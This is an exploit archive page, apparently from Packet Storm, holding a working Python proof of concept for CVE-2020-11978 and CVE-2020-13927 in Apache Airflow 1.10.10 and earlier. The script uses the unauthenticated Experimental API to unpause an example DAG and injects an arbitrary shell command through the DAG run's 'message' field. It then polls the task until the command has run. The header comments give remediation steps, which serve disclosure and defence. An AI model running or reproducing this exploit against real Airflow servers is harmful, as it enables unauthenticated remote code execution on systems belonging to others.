what you don't know can hurt you

Apache Airflow 1.10.10 Remote Code Execution

Apache Airflow 1.10.10 Remote Code Execution
Posted Jun 2, 2021
Authored by Pepe Berba

Apache Airflow versions 1.10.10 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2020-11978, CVE-2020-13927
SHA-256 | 90db73d06b832da1bd29f51da3759ba49ca9bf6dfbf04ca45ce41c9ce588afdc

Apache Airflow 1.10.10 Remote Code Execution

Change Mirror Download
# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution 
# Date: 2021-06-02
# Exploit Author: Pepe Berba
# Vendor Homepage: https://airflow.apache.org/
# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
# Version: <= 1.10.10
# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
# CVE : CVE-2020-11978
#
# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow
# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.
# Together, potentially allows unauthenticated RCE to Airflow
#
# Repo: https://github.com/pberba/CVE-2020-11978
# More information can be found here:
# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
#
# Remediation:
# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.
#
# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"

import argparse
import requests
import sys
import time

def create_dag(url, cmd):
print('[+] Checking if Airflow Experimental REST API is accessible...')
check = requests.get('{}/api/experimental/test'.format(url))

if check.status_code == 200:
print('[+] /api/experimental/test returned 200' )
else:
print('[!] /api/experimental/test returned {}'.format(check.status_code))
print('[!] Airflow Experimental REST API not be accessible')
sys.exit(1)

check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
if check_task.status_code != 200:
print('[!] Failed to find the example_trigger_target_dag.bash_task')
print('[!] Host isn\'t vunerable to CVE-2020-11978')
sys.exit(1)
elif 'dag_run' in check_task.json()['env']:
print('[!] example_trigger_target_dag.bash_task is patched')
print('[!] Host isn\'t vunerable to CVE-2020-11978')
sys.exit(1)
print('[+] example_trigger_target_dag.bash_task is vulnerable')

unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
if unpause.status_code != 200:
print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
sys.exit(1)
else:
print('[+] example_trigger_target_dag was enabled')

print('[+] Creating new DAG...')
res = requests.post(
'{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
json={
'conf': {
'message': '"; {} #'.format(cmd)
}
}
)

if res.status_code == 200:
print('[+] Successfully created DAG')
print('[+] "{}"'.format(res.json()['message']))
else:
print('[!] Failed to create DAG')
sys.exit(1)

wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
url = url,
execution_date=res.json()['execution_date']
)

start_time = time.time()
print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
print('[.] If the bash task is never queued, then the scheduler might not be running.')
while True:
time.sleep(10)
res = requests.get(wait_url)
status = res.json()['state']
if status == 'queued':
print('[.] Bash task queued...')
elif status == 'running':
print('[+] Bash task running...')
elif status == 'success':
print('[+] Bash task successfully ran')
break
elif status == 'None':
print('[-] Bash task is not yet queued...'.format(status))
else:
print('[!] Bash task was {}'.format(status))
sys.exit(1)

return 0


def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
arg_parser.add_argument('command', type=str)
args = arg_parser.parse_args()

create_dag(
args.url,
args.command
)

if __name__ == '__main__':
main()

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close